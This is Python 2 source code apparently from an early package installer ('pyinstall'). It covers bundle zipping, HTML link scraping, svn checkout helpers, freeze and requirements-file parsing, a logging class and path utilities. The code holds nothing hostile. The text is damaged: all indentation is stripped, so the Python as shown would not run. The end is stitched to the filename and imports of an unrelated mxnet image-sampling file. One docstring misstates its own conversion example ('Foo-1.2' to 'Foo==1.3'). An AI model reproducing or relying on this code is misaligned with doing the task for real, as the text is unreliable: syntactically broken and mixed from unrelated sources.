if dirpath.startswith(svn_dir):
# svn-checkout.txt already in parent directory
break
else:
svn_url, svn_rev = _get_svn_info(os.path.join(dir, dirpath))
svn_dirs.append(dirpath)
dirnames.remove('.svn')
for dirname in dirnames:
dirname = os.path.join(dirpath, dirname)
name = self._clean_zip_name(dirname, dir)
zip.writestr(basename + '/' + name + '/', '')
for filename in filenames:
filename = os.path.join(dirpath, filename)
name = self._clean_zip_name(filename, dir)
zip.write(filename, basename + '/' + name)
if svn_url:
name = os.path.join(dirpath, 'svn-checkout.txt')
name = self._clean_zip_name(name, dir)
zip.writestr(basename + '/' + name, self._svn_checkout_text(svn_url, svn_rev))
zip.writestr('pyinstall-manifest.txt', self.bundle_requirements())
zip.close()
# Unlike installation, this will always delete the build directories
logger.info('Removing temporary build dir %s and source dir %s'
% (self.build_dir, self.src_dir))
for dir in self.build_dir, self.src_dir:
if os.path.exists(dir):
shutil.rmtree(dir)
def _svn_checkout_text(self, svn_url, svn_rev):
return ('# This was an svn checkout; to make it a checkout again run:\n'
'svn checkout --force -r %s %s .\n' % (svn_rev, svn_url))
BUNDLE_HEADER = '''\
# This is a pyinstall bundle file, that contains many source packages
# that can be installed as a group. You can install this like:
# pyinstall this_file.zip
# The rest of the file contains a list of all the packages included:
'''
def bundle_requirements(self):
parts = [self.BUNDLE_HEADER]
for req in sorted(
[req for req in self.requirements.values()
if not req.comes_from],
key=lambda x: x.name):
parts.append('%s==%s\n' % (req.name, req.installed_version))
parts.append('# These packages were installed to satisfy the above requirements:\n')
for req in sorted(
[req for req in self.requirements.values()
if req.comes_from],
key=lambda x: x.name):
parts.append('%s==%s\n' % (req.name, req.installed_version))
## FIXME: should we do something with self.unnamed_requirements?
return ''.join(parts)
def _clean_zip_name(self, name, prefix):
assert name.startswith(prefix+'/'), (
"name %r doesn't start with prefix %r" % (name, prefix))
name = name[len(prefix)+1:]
name = name.replace(os.path.sep, '/')
return name
class HTMLPage(object):
"""Represents one page, along with its URL"""
## FIXME: these regexes are horrible hacks:
_homepage_re = re.compile(r'<th>\s*home\s*page', re.I)
_download_re = re.compile(r'<th>\s*download\s+url', re.I)
    ## These aren't so awful:
_rel_re = re.compile("""<[^>]*\srel\s*=\s*['"]?([^'">]+)[^>]*>""", re.I)
_href_re = re.compile('href=(?:"([^"]*)"|\'([^\']*)\'|([^>\\s\\n]*))', re.I|re.S)
def __init__(self, content, url, headers=None):
self.content = content
self.url = url
self.headers = headers
def __str__(self):
return self.url
@classmethod
def get_page(cls, link, req, cache=None, skip_archives=True):
url = link.url
url = url.split('#', 1)[0]
        if cache is not None and cache.too_many_failures(url):
return None
if url.lower().startswith('svn'):
logger.debug('Cannot look at svn URL %s' % link)
return None
if cache is not None:
inst = cache.get_page(url)
if inst is not None:
return inst
try:
if skip_archives:
if cache is not None:
if cache.is_archive(url):
return None
filename = link.filename
for bad_ext in ['.tar', '.tar.gz', '.tar.bz2', '.tgz', '.zip']:
if filename.endswith(bad_ext):
content_type = cls._get_content_type(url)
if content_type.lower().startswith('text/html'):
break
else:
logger.debug('Skipping page %s because of Content-Type: %s' % (link, content_type))
if cache is not None:
cache.set_is_archive(url)
return None
logger.debug('Getting page %s' % url)
resp = urllib2.urlopen(url)
real_url = resp.geturl()
headers = resp.info()
inst = cls(resp.read(), real_url, headers)
except (urllib2.HTTPError, urllib2.URLError, socket.timeout, socket.error), e:
desc = str(e)
if isinstance(e, socket.timeout):
log_meth = logger.warn
                level = 1
desc = 'timed out'
elif isinstance(e, urllib2.URLError):
log_meth = logger.warn
if hasattr(e, 'reason') and isinstance(e.reason, socket.timeout):
desc = 'timed out'
level = 1
else:
level = 2
elif isinstance(e, urllib2.HTTPError) and e.code == 404:
## FIXME: notify?
log_meth = logger.info
level = 2
else:
log_meth = logger.warn
level = 1
log_meth('Could not fetch URL %s: %s' % (link, desc))
log_meth('Will skip URL %s when looking for download links for %s' % (link.url, req))
if cache is not None:
cache.add_page_failure(url, level)
return None
if cache is not None:
cache.add_page([url, real_url], inst)
return inst
@staticmethod
def _get_content_type(url):
"""Get the Content-Type of the given url, using a HEAD request"""
scheme, netloc, path, query, fragment = urlparse.urlsplit(url)
if scheme == 'http':
ConnClass = httplib.HTTPConnection
elif scheme == 'https':
ConnClass = httplib.HTTPSConnection
else:
## FIXME: some warning or something?
## assertion error?
return ''
if query:
path += '?' + query
conn = ConnClass(netloc)
try:
conn.request('HEAD', path, headers={'Host': netloc})
resp = conn.getresponse()
if resp.status != 200:
## FIXME: doesn't handle redirects
return ''
return resp.getheader('Content-Type') or ''
finally:
conn.close()
@property
def links(self):
"""Yields all links in the page"""
for match in self._href_re.finditer(self.content):
url = match.group(1) or match.group(2) or match.group(3)
yield Link(urlparse.urljoin(self.url, url), self)
def rel_links(self):
for url in self.explicit_rel_links():
yield url
for url in self.scraped_rel_links():
yield url
def explicit_rel_links(self, rels=('homepage', 'download')):
"""Yields all links with the given relations"""
for match in self._rel_re.finditer(self.content):
found_rels = match.group(1).lower().split()
for rel in rels:
if rel in found_rels:
break
else:
continue
match = self._href_re.search(match.group(0))
if not match:
continue
url = match.group(1) or match.group(2) or match.group(3)
yield Link(urlparse.urljoin(self.url, url), self)
def scraped_rel_links(self):
for regex in (self._homepage_re, self._download_re):
match = regex.search(self.content)
if not match:
continue
href_match = self._href_re.search(self.content, pos=match.end())
if not href_match:
continue
            url = href_match.group(1) or href_match.group(2) or href_match.group(3)
if not url:
continue
url = urlparse.urljoin(self.url, url)
yield Link(url, self)
class PageCache(object):
"""Cache of HTML pages"""
failure_limit = 3
def __init__(self):
self._failures = {}
self._pages = {}
self._archives = {}
def too_many_failures(self, url):
return self._failures.get(url, 0) >= self.failure_limit
def get_page(self, url):
return self._pages.get(url)
def is_archive(self, url):
return self._archives.get(url, False)
def set_is_archive(self, url, value=True):
self._archives[url] = value
def add_page_failure(self, url, level):
self._failures[url] = self._failures.get(url, 0)+level
def add_page(self, urls, page):
for url in urls:
self._pages[url] = page
class Link(object):
def __init__(self, url, comes_from=None):
self.url = url
self.comes_from = comes_from
def __str__(self):
if self.comes_from:
return '%s (from %s)' % (self.url, self.comes_from)
else:
return self.url
def __repr__(self):
return '<Link %s>' % self
@property
def filename(self):
url = self.url
url = url.split('#', 1)[0]
url = url.split('?', 1)[0]
url = url.rstrip('/')
name = posixpath.basename(url)
assert name, (
'URL %r produced no filename' % url)
return name
@property
def scheme(self):
return urlparse.urlsplit(self.url)[0]
@property
def path(self):
return urlparse.urlsplit(self.url)[2]
def splitext(self):
return splitext(posixpath.basename(self.path.rstrip('/')))
_egg_fragment_re = re.compile(r'#egg=([^&]*)')
@property
def egg_fragment(self):
match = self._egg_fragment_re.search(self.url)
if not match:
return None
return match.group(1)
_md5_re = re.compile(r'md5=([a-f0-9]+)')
@property
def md5_hash(self):
match = self._md5_re.search(self.url)
if match:
return match.group(1)
return None
@property
def show_url(self):
return posixpath.basename(self.url.split('#', 1)[0].split('?', 1)[0])
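# Example of the Link fragment parsing above (illustrative URL):
#   link = Link('http://example.com/Foo-1.0.tar.gz#egg=Foo&md5=0123456789abcdef')
#   link.filename      -> 'Foo-1.0.tar.gz'
#   link.egg_fragment  -> 'Foo'
#   link.md5_hash      -> '0123456789abcdef'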
############################################################
## Writing freeze files
def write_freeze(filename, requirement, find_links, find_tags=False):
if filename == '-':
logger.move_stdout_to_stderr()
dependency_links = []
if filename == '-':
f = sys.stdout
else:
## FIXME: should be possible to overwrite requirement file
logger.notify('Writing frozen requirements to %s' % filename)
f = open(filename, 'w')
for dist in pkg_resources.working_set:
if dist.has_metadata('dependency_links.txt'):
dependency_links.extend(dist.get_metadata_lines('dependency_links.txt'))
for link in find_links:
if '#egg=' in link:
dependency_links.append(link)
for link in find_links:
f.write('-f %s\n' % link)
installations = {}
for dist in pkg_resources.working_set:
if dist.key in ('setuptools', 'pyinstall', 'python'):
## FIXME: also skip virtualenv?
continue
req = FrozenRequirement.from_dist(dist, dependency_links, find_tags=find_tags)
installations[req.name] = req
if requirement:
req_f = open(requirement)
for line in req_f:
if not line or line.strip().startswith('#'):
f.write(line)
continue
elif line.startswith('-e') or line.startswith('--editable'):
if line.startswith('-e'):
line = line[2:].strip()
else:
line = line[len('--editable'):].strip().lstrip('=')
line_req = InstallRequirement.from_editable(line)
elif (line.startswith('-r') or line.startswith('--requirement')
or line.startswith('-Z') or line.startswith('--always-unzip')):
logger.debug('Skipping line %r' % line.strip())
continue
else:
line_req = InstallRequirement.from_line(line)
if not line_req.name:
logger.notify("Skipping line because it's not clear what it would install: %s"
% line.strip())
continue
if line_req.name not in installations:
logger.warn("Requirement file contains %s, but that package is not installed"
% line.strip())
continue
f.write(str(installations[line_req.name]))
del installations[line_req.name]
f.write('## The following requirements were added by pyinstall --freeze:\n')
for installation in sorted(installations.values(), key=lambda x: x.name):
f.write(str(installation))
if filename != '-':
logger.notify('Put requirements in %s' % filename)
f.close()
class FrozenRequirement(object):
def __init__(self, name, req, editable, comments=()):
self.name = name
self.req = req
self.editable = editable
self.comments = comments
_rev_re = re.compile(r'-r(\d+)$')
_date_re = re.compile(r'-(20\d\d\d\d\d\d)$')
@classmethod
def from_dist(cls, dist, dependency_links, find_tags=False):
location = os.path.normcase(os.path.abspath(dist.location))
comments = []
if os.path.exists(os.path.join(location, '.svn')):
editable = True
req = get_src_requirement(dist, location, find_tags)
if req is None:
logger.warn('Could not determine svn location of %s' % location)
comments.append('## !! Could not determine svn location')
req = dist.as_requirement()
editable = False
else:
editable = False
req = dist.as_requirement()
specs = req.specs
assert len(specs) == 1 and specs[0][0] == '=='
version = specs[0][1]
ver_match = cls._rev_re.search(version)
date_match = cls._date_re.search(version)
if ver_match or date_match:
svn_location = get_svn_location(dist, dependency_links)
if not svn_location:
logger.warn(
'Warning: cannot find svn location for %s' % req)
comments.append('## FIXME: could not find svn URL in dependency_links for this package:')
else:
comments.append('# Installing as editable to satisfy requirement %s:' % req)
if ver_match:
rev = ver_match.group(1)
else:
rev = '{%s}' % date_match.group(1)
editable = True
req = 'svn+%s@%s#egg=%s' % (svn_location, rev, cls.egg_name(dist))
return cls(dist.project_name, req, editable, comments)
@staticmethod
def egg_name(dist):
name = dist.egg_name()
match = re.search(r'-py\d\.\d$', name)
if match:
name = name[:match.start()]
return name
def __str__(self):
req = self.req
if self.editable:
req = '-e %s' % req
return '\n'.join(list(self.comments)+[str(req)])+'\n'
def get_svn_location(dist, dependency_links):
egg_fragment_re = re.compile(r'#egg=(.*)$')
for url in dependency_links:
egg_fragment = Link(url).egg_fragment
if not egg_fragment:
continue
if '-' in egg_fragment:
## FIXME: will this work when a package has - in the name?
key = '-'.join(egg_fragment.split('-')[:-1]).lower()
else:
key = egg_fragment
if key == dist.key:
return url.split('#', 1)[0]
return None
def get_src_requirement(dist, location, find_tags):
if not os.path.exists(os.path.join(location, '.svn')):
logger.warn('cannot determine version of editable source in %s (is not svn checkout)' % location)
return dist.as_requirement()
repo = get_svn_url(location)
if repo is None:
return None
parts = repo.split('/')
## FIXME: why not project name?
egg_project_name = dist.egg_name().split('-', 1)[0]
if parts[-2] in ('tags', 'tag'):
# It's a tag, perfect!
return 'svn+%s#egg=%s-%s' % (repo, egg_project_name, parts[-1])
elif parts[-2] in ('branches', 'branch'):
# It's a branch :(
rev = get_svn_revision(location)
return 'svn+%s@%s#egg=%s%s-r%s' % (repo, rev, dist.egg_name(), parts[-1], rev)
elif parts[-1] == 'trunk':
# Trunk :-/
rev = get_svn_revision(location)
if find_tags:
tag_url = '/'.join(parts[:-1]) + '/tags'
tag_revs = get_tag_revs(tag_url)
match = find_tag_match(rev, tag_revs)
if match:
                logger.notify('trunk checkout %s seems to be equivalent to tag %s' % (location, match))
return 'svn+%s/%s#egg=%s-%s' % (tag_url, match, egg_project_name, match)
return 'svn+%s@%s#egg=%s-dev' % (repo, rev, dist.egg_name())
else:
# Don't know what it is
logger.warn('svn URL does not fit normal structure (tags/branches/trunk): %s' % repo)
rev = get_svn_revision(location)
return '%s@%s#egg=%s-dev' % (repo, rev, egg_project_name)
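# get_src_requirement (above) turns an svn checkout into an editable requirement
# string, e.g. 'svn+REPO_URL#egg=Project-TAG' for a tag checkout or
# 'svn+REPO_URL@REV#egg=...-dev' for a trunk checkout (values illustrative).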
_svn_xml_url_re = re.compile('url="([^"]+)"')
_svn_rev_re = re.compile('committed-rev="(\d+)"')
def get_svn_revision(location):
"""
Return the maximum revision for all files under a given location
"""
# Note: taken from setuptools.command.egg_info
revision = 0
for base, dirs, files in os.walk(location):
if '.svn' not in dirs:
dirs[:] = []
continue # no sense walking uncontrolled subdirs
dirs.remove('.svn')
entries_fn = os.path.join(base, '.svn', 'entries')
if not os.path.exists(entries_fn):
## FIXME: should we warn?
continue
f = open(entries_fn)
data = f.read()
f.close()
if data.startswith('8') or data.startswith('9'):
data = map(str.splitlines,data.split('\n\x0c\n'))
del data[0][0] # get rid of the '8'
dirurl = data[0][3]
revs = [int(d[9]) for d in data if len(d)>9 and d[9]]+[0]
if revs:
localrev = max(revs)
else:
localrev = 0
elif data.startswith('<?xml'):
            dirurl = _svn_xml_url_re.search(data).group(1) # get repository URL
revs = [int(m.group(1)) for m in _svn_rev_re.finditer(data)]+[0]
if revs:
localrev = max(revs)
else:
localrev = 0
else:
logger.warn("Unrecognized .svn/entries format; skipping %s", base)
dirs[:] = []
continue
if base == location:
base_url = dirurl+'/' # save the root url
elif not dirurl.startswith(base_url):
dirs[:] = []
continue # not part of the same svn tree, skip it
revision = max(revision, localrev)
return revision
def get_svn_url(location):
# In cases where the source is in a subdirectory, not alongside setup.py
# we have to look up in the location until we find a real setup.py
orig_location = location
while not os.path.exists(os.path.join(location, 'setup.py')):
last_location = location
location = os.path.dirname(location)
if location == last_location:
# We've traversed up to the root of the filesystem without finding setup.py
logger.warn("Could not find setup.py for directory %s (tried all parent directories)"
% orig_location)
return None
f = open(os.path.join(location, '.svn', 'entries'))
data = f.read()
f.close()
if data.startswith('8') or data.startswith('9'):
data = map(str.splitlines,data.split('\n\x0c\n'))
del data[0][0] # get rid of the '8'
return data[0][3]
elif data.startswith('<?xml'):
        return _svn_xml_url_re.search(data).group(1) # get repository URL
else:
logger.warn("Unrecognized .svn/entries format in %s" % location)
# Or raise exception?
return None
def get_tag_revs(svn_tag_url):
stdout = call_subprocess(
['svn', 'ls', '-v', svn_tag_url], show_stdout=False)
results = []
for line in stdout.splitlines():
parts = line.split()
rev = int(parts[0])
tag = parts[-1].strip('/')
results.append((tag, rev))
return results
def find_tag_match(rev, tag_revs):
best_match_rev = None
best_tag = None
for tag, tag_rev in tag_revs:
if (tag_rev > rev and
(best_match_rev is None or best_match_rev > tag_rev)):
# FIXME: Is best_match > tag_rev really possible?
# or is it a sign something is wacky?
best_match_rev = tag_rev
best_tag = tag
return best_tag
############################################################
## Requirement files
_scheme_re = re.compile(r'^(http|https|file):', re.I)
_drive_re = re.compile(r'/*([a-z])\|', re.I)
def get_file_content(url, comes_from=None):
"""Gets the content of a file; it may be a filename, file: URL, or
http: URL. Returns (location, content)"""
match = _scheme_re.search(url)
if match:
scheme = match.group(1).lower()
if (scheme == 'file' and comes_from
and comes_from.startswith('http')):
raise InstallationError(
'Requirements file %s references URL %s, which is local'
% (comes_from, url))
if scheme == 'file':
path = url.split(':', 1)[1]
path = path.replace('\\', '/')
match = _drive_re.match(path)
if match:
path = match.group(1) + ':' + path.split('|', 1)[1]
path = urllib.unquote(path)
if path.startswith('/'):
path = '/' + path.lstrip('/')
url = path
else:
## FIXME: catch some errors
resp = urllib2.urlopen(url)
return resp.geturl(), resp.read()
f = open(url)
content = f.read()
f.close()
return url, content
def parse_requirements(filename, finder, comes_from=None):
filename, content = get_file_content(filename, comes_from=comes_from)
for line_number, line in enumerate(content.splitlines()):
line_number += 1
line = line.strip()
if not line or line.startswith('#'):
continue
if line.startswith('-r') or line.startswith('--requirement'):
if line.startswith('-r'):
req_url = line[2:].strip()
else:
req_url = line[len('--requirement'):].strip().strip('=')
if _scheme_re.search(filename):
# Relative to a URL
                req_url = urlparse.urljoin(filename, req_url)
elif not _scheme_re.search(req_url):
req_url = os.path.join(os.path.dirname(filename), req_url)
for item in parse_requirements(req_url, finder, comes_from=filename):
yield item
elif line.startswith('-Z') or line.startswith('--always-unzip'):
# No longer used, but previously these were used in
# requirement files, so we'll ignore.
pass
elif line.startswith('-f') or line.startswith('--find-links'):
if line.startswith('-f'):
line = line[2:].strip()
else:
line = line[len('--find-links'):].strip().lstrip('=')
## FIXME: it would be nice to keep track of the source of
## the find_links:
finder.find_links.append(line)
else:
comes_from = '-r %s (line %s)' % (filename, line_number)
if line.startswith('-e') or line.startswith('--editable'):
if line.startswith('-e'):
line = line[2:].strip()
else:
line = line[len('--editable'):].strip()
req = InstallRequirement.from_editable(
line, comes_from)
else:
req = InstallRequirement(line, comes_from)
yield req
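# parse_requirements (above) understands a simple requirements-file format; an
# illustrative file, one directive or requirement per line:
#   # comments and blank lines are ignored
#   -f http://example.com/downloads
#   -r more-requirements.txt
#   -e svn+http://svn.example.com/Proj/trunk#egg=Proj
#   SomePackage==1.0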
############################################################
## Logging
class Logger(object):
"""
Logging object for use in command-line script. Allows ranges of
levels, to avoid some redundancy of displayed information.
"""
VERBOSE_DEBUG = logging.DEBUG-1
DEBUG = logging.DEBUG
INFO = logging.INFO
NOTIFY = (logging.INFO+logging.WARN)/2
WARN = WARNING = logging.WARN
ERROR = logging.ERROR
FATAL = logging.FATAL
LEVELS = [VERBOSE_DEBUG, DEBUG, INFO, NOTIFY, WARN, ERROR, FATAL]
def __init__(self, consumers):
self.consumers = consumers
self.indent = 0
self.in_progress = None
self.in_progress_hanging = False
def debug(self, msg, *args, **kw):
self.log(self.DEBUG, msg, *args, **kw)
def info(self, msg, *args, **kw):
self.log(self.INFO, msg, *args, **kw)
def notify(self, msg, *args, **kw):
self.log(self.NOTIFY, msg, *args, **kw)
def warn(self, msg, *args, **kw):
self.log(self.WARN, msg, *args, **kw)
def error(self, msg, *args, **kw):
        self.log(self.ERROR, msg, *args, **kw)
def fatal(self, msg, *args, **kw):
self.log(self.FATAL, msg, *args, **kw)
def log(self, level, msg, *args, **kw):
if args:
if kw:
raise TypeError(
"You may give positional or keyword arguments, not both")
args = args or kw
rendered = None
for consumer_level, consumer in self.consumers:
if self.level_matches(level, consumer_level):
if (self.in_progress_hanging
and consumer in (sys.stdout, sys.stderr)):
self.in_progress_hanging = False
sys.stdout.write('\n')
sys.stdout.flush()
if rendered is None:
if args:
rendered = msg % args
else:
rendered = msg
rendered = ' '*self.indent + rendered
if hasattr(consumer, 'write'):
consumer.write(rendered+'\n')
else:
consumer(rendered)
def start_progress(self, msg):
assert not self.in_progress, (
"Tried to start_progress(%r) while in_progress %r"
% (msg, self.in_progress))
if self.level_matches(self.NOTIFY, self._stdout_level()):
sys.stdout.write(' '*self.indent + msg)
sys.stdout.flush()
self.in_progress_hanging = True
else:
self.in_progress_hanging = False
self.in_progress = msg
self.last_message = None
def end_progress(self, msg='done.'):
assert self.in_progress, (
"Tried to end_progress without start_progress")
if self.stdout_level_matches(self.NOTIFY):
if not self.in_progress_hanging:
# Some message has been printed out since start_progress
sys.stdout.write('...' + self.in_progress + msg + '\n')
sys.stdout.flush()
else:
# These erase any messages shown with show_progress (besides .'s)
logger.show_progress('')
logger.show_progress('')
sys.stdout.write(msg + '\n')
sys.stdout.flush()
self.in_progress = None
self.in_progress_hanging = False
def show_progress(self, message=None):
"""If we are in a progress scope, and no log messages have been
shown, write out another '.'"""
if self.in_progress_hanging:
if message is None:
sys.stdout.write('.')
sys.stdout.flush()
else:
if self.last_message:
padding = ' ' * max(0, len(self.last_message)-len(message))
else:
padding = ''
sys.stdout.write('\r%s%s%s%s' % (' '*self.indent, self.in_progress, message, padding))
sys.stdout.flush()
self.last_message = message
def stdout_level_matches(self, level):
"""Returns true if a message at this level will go to stdout"""
return self.level_matches(level, self._stdout_level())
def _stdout_level(self):
"""Returns the level that stdout runs at"""
for level, consumer in self.consumers:
if consumer is sys.stdout:
return level
return self.FATAL
def level_matches(self, level, consumer_level):
"""
        >>> l = Logger([])
>>> l.level_matches(3, 4)
False
>>> l.level_matches(3, 2)
True
>>> l.level_matches(slice(None, 3), 3)
False
>>> l.level_matches(slice(None, 3), 2)
True
>>> l.level_matches(slice(1, 3), 1)
True
>>> l.level_matches(slice(2, 3), 1)
False
"""
if isinstance(level, slice):
start, stop = level.start, level.stop
if start is not None and start > consumer_level:
return False
            if stop is not None and stop <= consumer_level:
return False
return True
else:
return level >= consumer_level
@classmethod
def level_for_integer(cls, level):
levels = cls.LEVELS
if level < 0:
return levels[0]
if level >= len(levels):
return levels[-1]
return levels[level]
def move_stdout_to_stderr(self):
to_remove = []
to_add = []
for consumer_level, consumer in self.consumers:
if consumer == sys.stdout:
to_remove.append((consumer_level, consumer))
to_add.append((consumer_level, sys.stderr))
for item in to_remove:
self.consumers.remove(item)
self.consumers.extend(to_add)
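# Logger consumers are (level, consumer) pairs where the consumer is either a
# writable stream or a callable; a minimal setup (illustrative) would be:
#   logger = Logger([(Logger.NOTIFY, sys.stdout)])
#   logger.notify('hello')      # printed
#   logger.debug('details')     # filtered out (DEBUG is below NOTIFY)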
def call_subprocess(cmd, show_stdout=True,
filter_stdout=None, cwd=None,
raise_on_returncode=True,
command_level=Logger.DEBUG, command_desc=None,
extra_environ=None):
if command_desc is None:
cmd_parts = []
for part in cmd:
if ' ' in part or '\n' in part or '"' in part or "'" in part:
part = '"%s"' % part.replace('"', '\\"')
cmd_parts.append(part)
command_desc = ' '.join(cmd_parts)
if show_stdout:
stdout = None
else:
stdout = subprocess.PIPE
logger.log(command_level, "Running command %s" % command_desc)
env = os.environ.copy()
if extra_environ:
env.update(extra_environ)
try:
proc = subprocess.Popen(
cmd, stderr=subprocess.STDOUT, stdin=None, stdout=stdout,
cwd=cwd, env=env)
except Exception, e:
logger.fatal(
"Error %s while executing command %s" % (e, command_desc))
raise
all_output = []
if stdout is not None:
stdout = proc.stdout
while 1:
line = stdout.readline()
if not line:
break
line = line.rstrip()
all_output.append(line + '\n')
if filter_stdout:
level = filter_stdout(line)
if isinstance(level, tuple):
level, line = level
logger.log(level, line)
if not logger.stdout_level_matches(level):
logger.show_progress()
else:
logger.info(line)
else:
returned_stdout, returned_stderr = proc.communicate()
all_output = [returned_stdout or '']
proc.wait()
if proc.returncode:
if raise_on_returncode:
if all_output:
logger.notify('Complete output from command %s:' % command_desc)
logger.notify('\n'.join(all_output) + '\n----------------------------------------')
raise InstallationError(
"Command %s failed with error code %s"
% (command_desc, proc.returncode))
else:
logger.warn(
"Command %s had error code %s"
% (command_desc, proc.returncode))
if stdout is not None:
return ''.join(all_output)
_svn_url_re = re.compile(r'URL: (.+)')
_svn_revision_re = re.compile(r'Revision: (.+)')
def _get_svn_info(dir):
"""Returns (url, revision), where both are strings"""
assert not dir.rstrip('/').endswith('.svn'), 'Bad directory: %s' % dir
output = call_subprocess(['svn', 'info', dir], show_stdout=False,
extra_environ={'LANG': 'C'})
match = _svn_url_re.search(output)
if not match:
logger.warn('Cannot determine URL of svn checkout %s' % display_path(dir))
logger.info('Output that cannot be parsed: \n%s' % output)
return 'unknown', 'unknown'
url = match.group(1).strip()
match = _svn_revision_re.search(output)
if not match:
logger.warn('Cannot determine revision of svn checkout %s' % display_path(dir))
logger.info('Output that cannot be parsed: \n%s' % output)
return url, 'unknown'
return url, match.group(1)
############################################################
## Utility functions
def is_svn_page(html):
"""Returns true if the page appears to be the index page of an svn repository"""
return (re.search(r'<title>[^<]*Revision \d+:', html)
and re.search(r'Powered by (?:<a[^>]*?>)?Subversion', html, re.I))
def file_contents(filename):
fp = open(filename, 'rb')
try:
return fp.read()
finally:
fp.close()
def split_leading_dir(path):
path = str(path)
path = path.lstrip('/').lstrip('\\')
if '/' in path and (('\\' in path and path.find('/') < path.find('\\'))
or '\\' not in path):
return path.split('/', 1)
elif '\\' in path:
return path.split('\\', 1)
else:
return path, ''
def has_leading_dir(paths):
"""Returns true if all the paths have the same leading path name
(i.e., everything is in one subdirectory in an archive)"""
common_prefix = None
for path in paths:
prefix, rest = split_leading_dir(path)
if not prefix:
return False
elif common_prefix is None:
common_prefix = prefix
elif prefix != common_prefix:
return False
return True
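# Illustrative behaviour of the two helpers above:
#   split_leading_dir('pkg/sub/mod.py') -> ['pkg', 'sub/mod.py']
#   split_leading_dir('mod.py')         -> ('mod.py', '')
#   has_leading_dir(['pkg/a.py', 'pkg/b/c.py']) -> True
#   has_leading_dir(['pkg/a.py', 'other/b.py']) -> False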
def format_size(bytes):
if bytes > 1000*1000:
return '%.1fMb' % (bytes/1000.0/1000)
elif bytes > 10*1000:
return '%iKb' % (bytes/1000)
elif bytes > 1000:
return '%.1fKb' % (bytes/1000.0)
else:
return '%ibytes' % bytes
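# Illustrative output:
#   format_size(2500000) -> '2.5Mb'
#   format_size(25000)   -> '25Kb'
#   format_size(1500)    -> '1.5Kb'
#   format_size(512)     -> '512bytes'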
_normalize_re = re.compile(r'[^a-z]', re.I)
def normalize_name(name):
return _normalize_re.sub('-', name.lower())
def display_path(path):
"""Gives the display value for a given path, making it relative to cwd
if possible."""
path = os.path.normcase(os.path.abspath(path))
if path.startswith(os.getcwd() + os.path.sep):
path = '.' + path[len(os.getcwd()):]
return path
def parse_editable(editable_req):
"""Parses svn+http://blahblah@rev#egg=Foobar into a requirement
(Foobar) and a URL"""
match = re.search(r'(?:#|#.*?&)egg=([^&]*)', editable_req)
if not match or not match.group(1):
raise InstallationError(
'--editable=%s is not the right format; it must have #egg=Package'
% editable_req)
req = match.group(1)
## FIXME: use package_to_requirement?
match = re.search(r'^(.*?)(?:-dev|-\d.*)', req)
if match:
# Strip off -dev, -0.2, etc.
req = match.group(1)
url = editable_req
if url.lower().startswith('svn:'):
url = 'svn+' + url
if '+' not in url:
raise InstallationError(
'--editable=%s should be formatted with svn+URL' % editable_req)
vc_type = url.split('+', 1)[0].lower()
if vc_type != 'svn':
raise InstallationError(
'For --editable=%s only svn (svn+URL) is currently supported' % editable_req)
return req, url
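# Illustrative call (hypothetical URL):
#   parse_editable('svn+http://svn.example.com/Foo/trunk#egg=Foo')
#   -> ('Foo', 'svn+http://svn.example.com/Foo/trunk#egg=Foo')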
def backup_dir(dir, ext='.bak'):
"""Figure out the name of a directory to back up the given dir to
(adding .bak, .bak2, etc)"""
n = 1
extension = ext
while os.path.exists(dir + extension):
n += 1
extension = ext + str(n)
return dir + extension
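# Illustrative behaviour: backup_dir('/tmp/build') returns '/tmp/build.bak' if no
# backup exists yet, otherwise '/tmp/build.bak2', '/tmp/build.bak3', and so on.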
def ask(message, options):
"""Ask the message interactively, with the given possible responses"""
while 1:
response = raw_input(message)
response = response.strip().lower()
if response not in options:
print 'Your response (%r) was not one of the expected responses: %s' % (
response, ', '.join(options))
else:
return response
def open_logfile_append(filename):
"""Open the named log file in append mode.
If the file already exists, a separator will also be printed to
the file to separate past activity from current activity.
"""
exists = os.path.exists(filename)
log_fp = open(filename, 'a')
if exists:
print >> log_fp, '-'*60
print >> log_fp, '%s run on %s' % (sys.argv[0], time.strftime('%c'))
return log_fp
def is_url(name):
"""Returns true if the name looks like a URL"""
if ':' not in name:
return False
scheme = name.split(':', 1)[0].lower()
return scheme in ('http', 'https', 'file', 'ftp')
def is_filename(name):
if (splitext(name)[1].lower() in ('.zip', '.tar.gz', '.tar.bz2', '.tgz', '.tar', '.pybundle')
and os.path.exists(name)):
return True
if os.path.sep not in name and '/' not in name:
# Doesn't have any path components, probably a requirement like 'Foo'
return False
return True
_drive_re = re.compile('^([a-z]):', re.I)
_url_drive_re = re.compile('^([a-z])[|]', re.I)
def filename_to_url(filename):
"""
Convert a path to a file: URL. The path will be made absolute.
"""
filename = os.path.normcase(os.path.abspath(filename))
url = urllib.quote(filename)
if _drive_re.match(url):
url = url[0] + '|' + url[2:]
url = url.replace(os.path.sep, '/')
url = url.lstrip('/')
return 'file:///' + url
def url_to_filename(url):
"""
Convert a file: URL to a path.
"""
assert url.startswith('file:'), (
"You can only turn file: urls into filenames (not %r)" % url)
filename = url[len('file:'):].lstrip('/')
filename = urllib.unquote(filename)
if _url_drive_re.match(filename):
filename = filename[0] + ':' + filename[2:]
else:
filename = '/' + filename
return filename
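# Illustrative round trip on a POSIX path:
#   filename_to_url('/home/user/pkg.tar.gz') -> 'file:///home/user/pkg.tar.gz'
#   url_to_filename('file:///home/user/pkg.tar.gz') -> '/home/user/pkg.tar.gz'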
def get_requirement_from_url(url):
"""Get a requirement from the URL, if possible. This looks for #egg
in the URL"""
link = Link(url)
egg_info = link.egg_fragment
if not egg_info:
egg_info = splitext(link.filename)[0]
return package_to_requirement(egg_info)
def package_to_requirement(package_name):
"""Translate a name like Foo-1.2 to Foo==1.3"""
match = re.search(r'^(.*?)(-dev|-\d.*)', package_name)
if match:
name = match.group(1)
version = match.group(2)
else:
name = package_name
version = ''
if version:
return '%s==%s' % (name, version)
else:
return name
def splitext(path):
"""Like os.path.splitext, but take off .tar too"""
base, ext = posixpath.splitext(path)
if base.lower().endswith('.tar'):
ext = base[-4:] + ext
base = base[:-4]
return base, ext
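# Illustrative behaviour:
#   package_to_requirement('Foo-1.2') -> 'Foo==1.2'
#   package_to_requirement('Foo')     -> 'Foo'
#   splitext('archive.tar.gz')        -> ('archive', '.tar.gz')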
class _Inf(object):
"""I am bigger than everything!"""
def __cmp__(self, a):
if self is a:
return 0
return 1
def __repr__(self):
return 'Inf'
Inf = _Inf()
del _Inf
if __name__ == '__main__':
main()
|
magnetBatchSampler.py
|
import cv2
import time
import numpy as np
import mxnet as mx
import mxnet.ndarray as nd
from enum import Enum
from dataProcessor.imageProcessor import ImageProcessor
from dataProcessor.imageSampler import ImageSampler
